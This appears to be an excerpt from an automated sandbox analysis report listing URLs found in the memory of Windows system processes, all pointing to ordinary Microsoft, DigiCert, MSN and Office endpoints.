            Source: explorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3031801494.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: svchost.exe, 00000006.00000002.2961228667.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1718586388.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
            Source: SearchApp.exe, 0000000B.00000000.1771919499.0000024B425C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: explorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3031801494.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: svchost.exe, 00000006.00000002.2961228667.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1718586388.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
            Source: explorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3031801494.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.000000000982D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2961228667.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1718586388.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: SearchApp.exe, 0000000B.00000000.1771919499.0000024B425C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: explorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: SearchApp.exe, 0000000B.00000000.1755006893.000002433B7BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: explorer.exe, 00000003.00000002.3045067363.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1635099926.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3023688229.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000A.00000002.2963352033.000001ECFC470000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: svchost.exe, 00000005.00000002.2919603174.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715089541.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
            Source: svchost.exe, 00000005.00000002.2919603174.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715089541.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
            Source: svchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
            Source: explorer.exe, 00000003.00000000.1638855988.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
            Source: svchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comt
            Source: SearchApp.exe, 0000000B.00000000.1771194064.0000024B423E8000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1755590053.0000024340029000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
            Source: SearchApp.exe, 0000000B.00000000.1767315960.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
            Source: SearchApp.exe, 0000000B.00000000.1767315960.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
            Source: explorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
            Source: explorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
            Source: explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000003.00000002.3031801494.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000003.00000002.3031801494.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
            Source: explorer.exe, 00000003.00000002.2944847017.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1632391026.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1633247183.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2905026359.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000003.00000002.3031801494.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
            Source: explorer.exe, 00000003.00000002.3031801494.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000003.00000002.3031801494.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
            Source: svchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
            Source: svchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
            Source: svchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
            Source: svchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.comer
            Source: svchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.coms
            Source: explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
            Source: explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
            Source: svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000006.00000000.1718218734.0000019E297F1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2947061368.0000019E297F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-GB
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
            Source: explorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
            Source: explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: StartMenuExperienceHost.exe, 00000009.00000002.2905023866.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728659205.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comcp
            Source: SearchApp.exe, 0000000B.00000000.1808464287.0000024B44916000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfills
            Source: SearchApp.exe, 0000000B.00000000.1808464287.0000024B44916000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfillsThis
            Source: SearchApp.exe, 0000000B.00000000.1769491887.0000024B42180000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcc.loki.delve.office.com/api
            Source: SearchApp.exe, 0000000B.00000000.1769491887.0000024B42180000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcchigh.loki.office365.us/api/
            Source: svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
            Source: explorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
            Source: svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: svchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
            Source: svchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
            Source: svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1771563723.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
            Source: svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
            Source: SearchApp.exe, 0000000B.00000000.1769589682.0000024B4218C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api
            Source: SearchApp.exe, 0000000B.00000000.1769589682.0000024B4218C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://msit.loki.delve.office.com/apiQ
            Source: StartMenuExperienceHost.exe, 00000009.00000002.2911384205.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728745445.000001B9814D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
            Source: SearchApp.exe, 0000000B.00000000.1805286472.0000024B447CF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access
            Source: SearchApp.exe, 0000000B.00000000.1763641682.0000024B41B40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWriteK
            Source: SearchApp.exe, 0000000B.00000000.1829269370.0000024B55259000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/mail/deeplink/attachment/
            Source: explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
            Source: StartMenuExperienceHost.exe, 00000009.00000002.2905023866.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728659205.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comxee
            Source: SearchApp.exe, 0000000B.00000000.1766436902.0000024B41E30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://searchapp.bundleassets.example/desktop/2.html
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
            Source: SearchApp.exe, 0000000B.00000000.1763641682.0000024B41B40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.Access
            Source: SearchApp.exe, 0000000B.00000000.1829269370.0000024B55259000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWriteO
            Source: SearchApp.exe, 0000000B.00000000.1829269370.0000024B55259000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/events?scenario=
            Source: smartscreen.exe, 00000010.00000002.2966541027.000001A22A337000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us
            Source: smartscreen.exe, 00000010.00000002.2966541027.000001A22A337000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us
            Source: smartscreen.exe, 00000010.00000002.2966541027.000001A22A337000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us
            Source: SearchApp.exe, 0000000B.00000000.1752124326.0000024339C00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/shellRESP
            Source: SearchApp.exe, 0000000B.00000000.1752124326.0000024339C00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/shell
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000003.00000002.3059382822.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1638855988.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
            Source: explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2905023866.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728659205.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
            Source: explorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
            Source: explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
            Source: SearchApp.exe, 0000000B.00000000.1829269370.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1829269370.0000024B55240000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbm
            Source: SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
